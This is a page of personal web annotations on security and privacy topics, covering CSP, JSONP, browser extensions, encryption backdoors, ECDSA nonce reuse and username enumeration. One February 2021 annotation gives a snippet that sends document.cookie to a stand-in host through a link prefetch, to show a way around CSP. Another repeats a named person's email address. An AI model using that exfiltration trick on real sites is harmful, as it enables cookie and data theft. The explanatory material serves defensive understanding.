931 Matching Annotations
  1. Mar 2021
  2. Feb 2021
    1. I have a Content Security Policy! Oh, do you now. And did somebody tell you that this would prevent malicious code from sending data off to some dastardly domain? I hate to be the bearer of bad news, but the following four lines of code will glide right through even the strictest content security policy.
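
      A sketch of the kind of snippet being alluded to here (placeholders: evil.example.com, stolenData). Whether it slips past a given policy depends on the browser: prefetch requests have historically not been covered by connect-src, and prefetch-src support is patchy.

        // Exfiltration via a browser prefetch hint rather than fetch/XHR.
        const stolenData = document.cookie; // stands in for whatever the malicious code gathered
        const link = document.createElement('link');
        link.rel = 'prefetch';
        link.href = 'https://evil.example.com/collect?d=' + encodeURIComponent(stolenData);
        document.head.appendChild(link);
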
  3. Jan 2021
    1. I run a fairly ancient RedHat Enterprise 6 on my 32-bit test machine and if I need something requiring Gtk3 (such as the latest Firefox or Chrome), I just make a chroot and use debootstrap (from EPEL) to get me a Debian 9 userland for that program. Easy. No bizarre "app stores", no conflicting packages. Do people use Snap app-stores because they don't know how to use the chroot command? Or are they just lazy? If it is because they want the added security of a container, substitute chroot with lxc... Shouldn't be necessary though; if you avoid non-ethical software (i.e. app stores), you are very unlikely to need the added security.
    1. "in the Ubuntu 20.04 package base, the Chromium package is indeed empty and acting, without your consent, as a backdoor by connecting your computer to the Ubuntu Store. Applications in this store cannot be patched, or pinned. You can't audit them, hold them, modify them or even point snap to a different store. You've as much empowerment with this as if you were using proprietary software, i.e. none."
    1. At least one Zoom leaker has already been unmasked: a member of the New York State Assembly who apparently filmed his “self-view” while recording a dispute within the Democratic assembly conference over the renomination of the speaker. That may sound careless, but a feature developed by Zoom will allow future leakers to be exposed even without that sort of misstep.
    1. I remember reading Matt Bruenig when I was in college, and he was like, “Well, actually Social Security was the most effective pathway to bring people out of poverty.”  I wrote a story in 2017 called “Why Education Is Not the Key to a Good Income,” and it was looking at this growing body of research that showed it was not your level of education that determined your chances of rising economic mobility. It was these other factors—like what kind of industries were in your community, union density, some of it was marriage. 

      makes sense... the best way out of poverty isn't education... it's money.

  4. atomiks.github.io
    1. JSONP is a relic of the past and shouldn’t be used due to numerous limitations (e.g., being able to send GET requests only) and many security concerns (e.g., the server can respond with whatever JavaScript code it wants — not necessarily the one we expect — which then has access to everything in the context of the window, including localStorage and cookies).
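
      For reference, a minimal sketch of the JSONP pattern being criticised: the "response" is just a script tag whose contents the server fully controls, so it runs with the same privileges as the page. The endpoint and callback name below are made up.

        function jsonp(url, callbackName) {
          return new Promise((resolve) => {
            // The server is expected to reply with `callbackName({...})` ...
            window[callbackName] = (data) => resolve(data);
            const script = document.createElement('script');
            // ... but it can ship arbitrary JavaScript instead, with full access
            // to the window, localStorage and cookies.
            script.src = url + '?callback=' + callbackName;
            document.head.appendChild(script);
          });
        }

        // jsonp('https://api.example.com/data', 'handleData').then(console.log);
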
    1. Many people are also very wary of PPAs because they can contain anything. While a PPA might say it contains “Music Player”, the owner of the PPA can put anything in it. The deb installed from a PPA has root on your system when installed, so can do anything - good or bad.
    1. As you already noticed, the extension does not go in and manipulate the hrefs/urls in the DOM itself. While it may seem scary to you that an extension may manipulate a URL you're navigating to in-flight, I think it's far scarier to imagine an extension reading and manipulating all of the HTML on all of the pages you go to (bank accounts, utilities, crypto, etc) in order to provide a smidgeon of privacy for the small % of times you happen to click a link with some UTM params.
    1. When you use target="_blank" with Links, it is recommended to always set rel="noopener" or rel="noreferrer" when linking to third party content. rel="noopener" prevents the new page from being able to access the window.opener property and ensures it runs in a separate process. Without this, the target page can potentially redirect your page to a malicious URL. rel="noreferrer" has the same effect, but also prevents the Referer header from being sent to the new page. ⚠️ Removing the referrer header will affect analytics.
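
      A small sketch of the two ways this usually comes up (the URL is a placeholder):

        // Opening a third-party page from script: 'noopener' (and/or 'noreferrer')
        // severs window.opener so the new tab can't redirect this page.
        window.open('https://third-party.example.com', '_blank', 'noopener,noreferrer');

        // Building a link element: same idea via the rel attribute.
        const a = document.createElement('a');
        a.href = 'https://third-party.example.com';
        a.target = '_blank';
        a.rel = 'noopener noreferrer'; // drop 'noreferrer' if you still need the Referer for analytics
        a.textContent = 'Third-party site';
        document.body.appendChild(a);
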
  5. Dec 2020
    1. The only solution that I can see is to ensure that each user gets their own set of stores for each server-rendered page. We can achieve this with the context API, and expose the stores like so:

         <script>
           import { stores } from '@sapper/app';
           const { page, preloading, session } = stores();
         </script>

      Calling stores() outside component initialisation would be an error.

      Good solution.

    1. Just realised this doesn't actually work. If store is just something exported by the app, there's no way to prevent leakage. Instead, it needs to be tied to rendering, which means we need to use the context API. Sapper needs to provide a top level component that sets the store as context for the rest of the app. You would therefore only be able to access it during initialisation, which means you couldn't do it inside a setTimeout and get someone else's session by accident:
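
      A rough sketch of the idea using Svelte's context API (illustrative only; the names mirror the quoted Sapper API, not its actual source):

        <!-- Top-level component, rendered once per server request -->
        <script>
          import { setContext } from 'svelte';
          import { writable } from 'svelte/store';

          export let session;

          // Each request gets its own stores, keyed on this component tree's
          // context, so state can't leak between concurrent users.
          setContext('__sapper__', {
            page: writable({}),
            preloading: writable(false),
            session: writable(session),
          });
        </script>

        // @sapper/app's stores() then just reads the context back:
        import { getContext } from 'svelte';
        export function stores() {
          // getContext only works during component initialisation, which is
          // what makes calling stores() inside a setTimeout an error.
          return getContext('__sapper__');
        }
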
    1. This is an opportunity to fix a bug: if you're on a page that redirects to a login page if there's no user object, or otherwise preloads data specific to that user, then logging out won't automatically update the page — you could easily end up with a page like:

         HOME   ABOUT   LOG IN
         ----------------------------------------
         Secret, user-specific data that shouldn't be visible alongside a 'log in' button
  6. Nov 2020
    1. to be listed on Mastodon’s official site, an instance has to agree to follow the Mastodon Server Covenant which lays out commitments to “actively moderat[e] against racism, sexism, homophobia and transphobia”, have daily backups, grant more than one person emergency access, and notify people three months in advance of potential closure. These indirect methods are meant to ensure that most people who encounter a platform have a safe experience, even without the advantages of centralization.

      Some of these baseline protections are certainly a good idea. Advance notice of shutdown and backups are particularly valuable.

      I'd not known of the Mastodon Server Covenant before.

    1. @hypothes.is

      Be careful: because you store the page title, when we make an annotation on a personal website that puts personal information in the title, hypothes.is users can retrieve that information.

      For example, here I can see that jbarnett's mail is jeankap@gmail.com.

      And I can see his mail's title.

      I will look for a report option; that would be better than this current annotation.

    1. This is addressing a security issue; and the associated threat model is "as an attacker, I know that you are going to do FROM ubuntu and then RUN apt-get update in your build, so I'm going to trick you into pulling an image that pretends to be the result of ubuntu + apt-get update so that next time you build, you will end up using my fake image as a cache, instead of the legit one." With that in mind, we can start thinking about an alternate solution that doesn't compromise security.
    1. If your Svelte components contain <style> tags, by default the compiler will add JavaScript that injects those styles into the page when the component is rendered. That's not ideal, because it adds weight to your JavaScript, prevents styles from being fetched in parallel with your code, and can even cause CSP violations. A better option is to extract the CSS into a separate file. Using the emitCss option as shown below would cause a virtual CSS file to be emitted for each Svelte component. The resulting file is then imported by the component, thus following the standard Webpack compilation flow.
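
      The "shown below" configuration didn't make it into this excerpt; a typical svelte-loader + mini-css-extract-plugin setup looks roughly like this (a sketch, adjust to your own build):

        // webpack.config.js
        const MiniCssExtractPlugin = require('mini-css-extract-plugin');

        module.exports = {
          module: {
            rules: [
              {
                test: /\.svelte$/,
                use: {
                  loader: 'svelte-loader',
                  options: { emitCss: true }, // emit a virtual .css file per component
                },
              },
              {
                // The emitted CSS then flows through the normal CSS pipeline
                // and is written out as a real stylesheet.
                test: /\.css$/,
                use: [MiniCssExtractPlugin.loader, 'css-loader'],
              },
            ],
          },
          plugins: [new MiniCssExtractPlugin()],
        };
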
    1. Now let me get back to your question. The FBI presents its conflict with Apple over locked phones as a case of privacy versus security. Yes, smartphones carry a lot of personal data—photos, texts, email, and the like. But they also carry business and account information; keeping that secure is really important. The problem is that if you make it easier for law enforcement to access a locked device, you also make it easier for a bad actor—a criminal, a hacker, a determined nation-state—to do so as well. And that's why this is a security vs. security issue.

      The debate should not be framed as privacy-vs-security because when you make it easier for law enforcement to access a locked device, you also make it easier for bad actors to do so as well. Thus it is a security-vs-security issue.

    1. Barr makes the point that this is about “consumer cybersecurity” and not “nuclear launch codes.” This is true, but it ignores the huge amount of national security-related communications between those two poles. The same consumer communications and computing devices are used by our lawmakers, CEOs, legislators, law enforcement officers, nuclear power plant operators, election officials and so on. There’s no longer a difference between consumer tech and government tech—it’s all the same tech.

      The US government's defence for wanting to introduce backdoors into consumer encryption is that in doing so they would not be weakening the encryption for, say, nuclear launch codes.

      Schneier holds that this distinction between government and consumer tech no longer exists. Weakening consumer tech amounts to weakening government tech. Therefore it's not worth doing.

  7. Oct 2020
    1. Australia's Cyber Security Strategy: a $1.66 billion cyber security package = AFP gets $88 million; $66 million to critical infrastructure organisations to assess their networks for vulnerabilities; ASD $1.35 billion (over a decade) to recruit 500 officers.

      Reasons Dutton gives for package:

      • child exploitation
      • criminals scamming, ransomware
      • foreign governments taking health data and potential attacks to critical infrastructure

      What is defined as critical infrastructure is expanded, and those organisations are subject to obligations to improve their defences.

      Supporting cyber resilience of SMEs through information, training, and services to make them more secure.

    1. Could you please explain why it is a vulnerability for an attacker to know the user names on a system? Currently External Identity Providers are wildly popular, meaning that user names are personal emails. My amazon account is my email address, my Azure account is my email address and both sites manage highly valuable information that could take a whole company out of business... and yet, they show no concern on hiding user names...

      Good question: Why do the big players like Azure not seem to worry? Microsoft, Amazon, Google, etc. too probably. In fact, any email provider. So once someone knows your email address, you are (more) vulnerable to someone trying to hack your account. Makes me wonder if the severity of this problem is overrated.

      Irony: He (using his full real name) posts:

      1. Information about which account ("my Azure account is my email address"), and
      2. How high-value of a target he would be ("both sites manage highly valuable information that could take a whole company out of business...")

      thus making himself more of a target. (I hope he does not get targeted though.)

    2. That is certainly a good use-case. One thing you can do is to require something other than a user-chosen string as a username, something like an email address, which should be unique. Another thing you could do, and I admit this is not user-friendly at all, is to let them sign up with that user name, but send the user an email letting them know that the username is already used. It still indicates a valid username, but adds a lot of overhead to the process of enumeration.
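
      A sketch of what that flow could look like (Express-style handler; findUserByUsername, createUser and the mail helpers are hypothetical):

        app.post('/signup', async (req, res) => {
          const { username, email, password } = req.body;
          const existing = await findUserByUsername(username);

          if (existing) {
            // Don't reveal anything in the HTTP response; move the signal out of band.
            await sendUsernameTakenEmail(email, username);
          } else {
            await createUser({ username, email, password });
            await sendConfirmationEmail(email);
          }

          // Identical response either way, so the endpoint itself can't be used
          // for cheap, automated username enumeration.
          res.status(200).json({ message: 'Check your email to continue.' });
        });
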
  8. Sep 2020
  9. Aug 2020
  10. Jul 2020
    1. While stylesheets can be reworked relatively easily with AMP by inlining the CSS, the same is not true for JavaScript. The tag 'script' is disallowed except in specific forms. In general, scripts in AMP are only allowed if they follow two major requirements: All JavaScript must be asynchronous (i.e., include the async attribute in the script tag). The JavaScript is for the AMP library and for any AMP components on the page. This effectively rules out the use of all user-generated/third-party JavaScript in AMP except as noted below.
    1. If you have worked with emails before, the idea of placing a script into an email may set off alarm bells in your head! Rest assured, email providers who support AMP emails enforce fierce security checks that only allow vetted AMP scripts to run in their clients. This enables dynamic and interactive features to run directly in the recipients' mailboxes with no security vulnerabilities! Read more about the required markup for AMP Emails here.
    1. It's possible for a document to match more than one match statement. In the case where multiple allow expressions match a request, the access is allowed if any of the conditions is true

      overlapping match statements

  11. Jun 2020
    1. For a political body that devotes a lot of attention to national security, the implicit threat of revoking Section 230 protection from organizations that implement end-to-end encryption is both troubling and confusing. Signal is recommended by the United States military. It is routinely used by senators and their staff. American allies in the EU Commission are Signal users too. End-to-end encryption is fundamental to the safety, security, and privacy of conversations worldwide.
    2. The EARN IT act turns Section 230 protection into a hypocritical bargaining chip. At a high level, what the bill proposes is a system where companies have to earn Section 230 protection by following a set of designed-by-committee “best practices” that are extraordinarily unlikely to allow end-to-end encryption. Anyone who doesn’t comply with these recommendations will lose their Section 230 protection.
    1. As uber-secure messaging platform Signal has warned, “Signal is recommended by the United States military. It is routinely used by senators and their staff. American allies in the EU Commission are Signal users too. End-to-end encryption is fundamental to the safety, security, and privacy of conversations worldwide.”
    2. On April 24, the U.S. National Security Agency published an advisory document on the security of popular messaging and video conferencing platforms. The NSA document “provides a snapshot of best practices,” it says, “coordinated with the Department of Homeland Security.” The NSA goes on to say that it “provides simple, actionable, considerations for individual government users—allowing its workforce to operate remotely using personal devices when deemed to be in the best interests of the health and welfare of its workforce and the nation.” Again somewhat awkwardly, the NSA awarded top marks to WhatsApp, Wickr and Signal, the three platforms that are the strongest advocates of end-to-end message encryption. Just to emphasize the point, the first criteria against which NSA marked the various platforms was, you guessed it, end-to-end encryption.
    3. Once the platforms introduce backdoors, those arguing against such a move say, bad guys will inevitably steal the keys. Lawmakers have been clever. No mention of backdoors at all in the proposed legislation or the need to break encryption. If you transmit illegal or dangerous content, they argue, you will be held responsible. You decide how to do that. Clearly there are no options other than some form of backdoor.
    4. While this debate has been raging for a year, the current “EARN-IT’ bill working its way through the U.S. legislative process is the biggest test yet for the survival of end-to-end encryption in its current form. In short, this would enforce best practices on the industry to “prevent, reduce and respond to” illicit material. There is no way they can do that without breaking their own encryption. QED.
    1. The issue, though—and it’s a big one, is that the SMS infrastructure is inherently insecure, lending itself to so-called “man-in-the-middle attacks.” Messages run through network data centres, everything can be seen—security is basic at best, and you are vulnerable to local carrier interception when travelling.
    1. On the encryption front, HRW echoes others that have argued vehemently against the proposals—that weakened encryption will “endanger all people who rely on encryption for safety and security—once one government enjoys special access, so too will rights-abusing governments and criminal hackers.” Universal access to encryption “enables everyone, from children attending school online to journalists and whistleblowers, to exercise their rights without fear of retribution.”
    1. Just like Blackberry, WhatsApp has claimed that they are end to end encrypted but in fact that is not true. WhatsApp (and Blackberry) decrypt all your texts on their servers and they can read everything you say to anyone and everyone. They (and Blackberry) then re-encrypt your messages, to send them to the recipient, so that your messages look like they were encrypted the entire time, when in fact they were not.
    1. If the EU is set to mandate encryption backdoors to enable law enforcement to pursue bad actors on social media, and at the same time intends to continue to pursue the platforms for alleged bad practices, then entrusting their diplomatic comms to those platforms, while forcing them to have the tools in place to break encryption as needed would seem a bad idea.
    2. First, the recognition that sensitive information needs to be transmitted securely over instant messaging platforms plays into the hands of the privacy advocates who are against backdoors in the end-to-end encryption used on WhatsApp, Signal, Wickr, iMessage and others. The core argument from the privacy lobby is that a backdoor will almost certainly be exploited by bad actors. Clearly, the EU (and others) would not risk their own comms with such a vulnerability.
    1. Security agencies use anti-terror efforts to justify planting backdoors. The problem is that such backdoors can also be used by criminals and authoritarian governments. No wonder dictators seem to love WhatsApp: its lack of security allows them to spy on their own people, so WhatsApp continues to be freely available in places like Russia or Iran, where Telegram is banned by the authorities
  12. May 2020
    1. There is a serious weakness in DSA (which extends to ECDSA) that has been exploited in several real world systems (including Android Bitcoin wallets and the PS3); the signature algorithm relies on quality randomness (bits that are indistinguishable from random); once the PRNG enters a predictable state, signatures may leak private keys. Systems that use ECDSA must be aware of this issue, and pay particular attention to their PRNG.
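
      To see why, here is the standard recovery argument (LaTeX notation; a sketch): suppose two messages with hashes z_1 and z_2 are signed with the same nonce k, so both signatures share the same r; d is the private key and n the group order.

        s_1 = k^{-1}(z_1 + r d) \bmod n, \qquad s_2 = k^{-1}(z_2 + r d) \bmod n
        \Rightarrow\ k = (z_1 - z_2)(s_1 - s_2)^{-1} \bmod n
        \Rightarrow\ d = (s_1 k - z_1)\, r^{-1} \bmod n

      A single repeated (or predictable) nonce therefore hands over the private key, which is what happened in the Android wallet and PS3 incidents mentioned above.
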
    1. GanttLab does not store any information: everything runs in your browser. Under the hood, we use localForage to remember the state of the application, which enables great user experience without any security risk. Secured API requests are initiated in your computer's browser, hence coming straight from your local network. Those requests are going directly to the data source you selected (your GitHub or GitLab account) without ever transiting through any other server.
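
      A minimal sketch of that pattern with localForage (the key name is illustrative): state is persisted in the browser's own storage (IndexedDB, WebSQL or localStorage, whichever is available) and never sent to a server.

        import localforage from 'localforage';

        async function saveState(state) {
          await localforage.setItem('ganttlab-state', state);
        }

        async function loadState() {
          return (await localforage.getItem('ganttlab-state')) || {};
        }
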
    1. Image consumers can enable DCT to ensure that images they use were signed. If a consumer enables DCT, they can only pull, run, or build with trusted images. Enabling DCT is a bit like applying a “filter” to your registry. Consumers “see” only signed image tags and the less desirable, unsigned image tags are “invisible” to them.
    1. In terms of their border dispute, India and China are struggling with what game theorists refer to as a “commitment problem.” Meaning: a commitment problem arises when two states, who would be better off in the present if they consented to a mutually beneficial agreement, are unable to resolve their disputes due to different expectations of future strengths, and a consequent inability to commit to future bargaining power or a division of benefits.
  13. developer.chrome.com
    1. If a user clicks on that button, the onclick script will not execute. This is because the script did not immediately execute and code not interpreted until the click event occurs is not considered part of the content script, so the CSP of the page (not of the extension) restricts its behavior. And since that CSP does not specify unsafe-inline, the inline event handler is blocked.
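
      In practice the fix is to attach the handler from the content script instead of inlining it, e.g. (a sketch):

        // Injected by a content script. An inline handler such as
        //   button.setAttribute('onclick', 'doSomething()');
        // only runs when the click happens, so it executes as page code and the
        // page's CSP (without 'unsafe-inline') blocks it.
        const button = document.createElement('button');
        button.textContent = 'Click me';
        button.addEventListener('click', () => {
          // This closure stays part of the content script, so it is governed by
          // the extension's CSP, not the page's.
          console.log('clicked');
        });
        document.body.appendChild(button);
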
    1. I appreciate the vigilance, but it would be even better to actually publish a technical reasoning for why you folks believe Firefox is above the device owner, and the root user, and why there should be no possibility through any means and configuration protections to enable users to run their own code in the release version of Firefox.
    1. Mozilla does not permit extensions distributed through https://addons.mozilla.org/ to load external scripts. Mozilla does allow extensions to be externally distributed, but https://addons.mozilla.org/ is how most people discover extensions. There are still concerns: Google and Microsoft do not grant permission for others to distribute their "widget" scripts. Google's and Microsoft's "widget" scripts are minified. This prevents Mozilla's reviewers from being able to easily evaluate the code that is being distributed. Mozilla can reject an extension for this. Even if an extension author self-distributes, Mozilla can request the source code for the extension and halt its distribution for the same reason.

      Maybe not technically a catch-22/chicken-and-egg problem, but what is a better name for this logical/dependency problem?